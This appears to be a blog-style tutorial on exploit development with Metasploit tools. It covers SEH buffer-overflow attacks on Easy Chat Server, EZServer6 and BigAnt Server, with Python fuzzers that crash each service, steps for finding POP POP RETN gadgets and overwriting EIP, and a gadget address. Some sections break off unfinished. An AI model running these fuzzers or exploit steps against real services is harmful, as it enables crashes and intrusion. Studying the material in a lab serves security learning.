Crafted File with Msfpayload and Msfencode

Metasploit is framework which provides information about security vulnerabilities and aids in penetration testing. There are several programs in metasploit, included msfpayload and msfencode.

 

msfpayload is one of the tools contained in metasploit used to make a payload. 

Software Exploitation : Easy Chat Server

Now, I'm going to show you how to exploitation an application called EasyChatServer running on Windows XP SP3.

as shown in the image above, we can access the server using a browser in backtrck system.

Because this application is a web application, we will tap using wireshark.

From the above description, we can use the GET method to perform exploitation

Our first fuzzer :

#!/usr/bin/python

import socket
target="192.168.1.101"
target_port=80
data="\x41" * 5000
buff="GET /chat.ghp?username="+data+"&password="+data+"&room=1 HTTP/1.1\r\n"
buff+="Host:192.168.1.101\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff+"\r\n\r\n")
print "Sukses....!!"
sock.close()



Now, we can see what happens in SEH chain (view + SEH chain).

Then, press Shift+F9, and look at this picture :

looking for a stepping stone

Finding a stepping stone is the file in which there is a command RETN POP POP. So, I choose ssleay.dll in easy chat server folder installation.

As we can see in the picture, the value of bits in the second byte is zero. so the module does not have the protection or safeSEH SEH. Now, we will looking for RETN POP POP commands contained in the module ssleay32.dll.







root@bt:/opt/metasploit/msf3# ./msfpescan -p /root/ssleay32.dll

 we can use RETN POP POP commands that are in the address 0x1001b9a2

In OllyDbg select the menu view+Executable modules, then double click ssleay32.dll. 

 
In this module window, right click+search for + Sequence of commands.

 a new window will appear and fill it with the following command.

 


























click find button and a new window will appear again.

seek offsets to overwrite SEH

In this step, we can use ./patter_create.rb

Input the results of pattern_create (chatpattern.txt) into our fuzzer.

 





Then in OllyDbg will look like the following :

 Then, press Shift+F9, and then we will know the contents of the EIP.

We can use patter_offset.rb to determine the number of bytes to EIP affected by the fuzzer.

 





 with these results, we will modify our fuzzer as follows:

fuzzer run and look in OllyDbg. 

Press shift+f9 and see what happens in EIP.

 

 

Software Exploitation : EZServer6

In this tutorial, we will try to exploit an application for video server, called ezserver, running on Windows XP. This application can be accessed with a web browser on port 8000. so, we will send a fuzzer that contains garbage data via GET method.

Fuzzer used are as follows:
#!/usr/bin/python

import socket
target="192.168.1.101"
target_port=8000
buff="GET /" + "\x41" * 10000 + "HTTP/1.0\r\n\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()

Let's fuzzing and see what happens...

ez server crashes and disappears from the screen. Then we will see through OllyDbg.

To be Continue...^_^

Software Exploitation : BigAnt Server

As we know that BigAnt Server compiled with SEH and safeSEH, in this tutorial I'm going to show you how to exploitation this application.

Fuzzing :

#!/usr/bin/python

import socket
target="192.168.1.101"
target_port=6660
buff="USV " + "\x41" * 2500
buff+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()

run this fuzzer and see what happens..in Ollydbg

But, EIP not overwrite with our fuzzer, because this application compiled with SEH and safeSEH. To look into SEH, select view+SEH chain.

So, press shift+F9 button to forward our fuzzer in to EIP.

In the figure above, we can see that EIP overwrite with 41414141, where this characters comes from the fuzzer.

 To be continue...^_^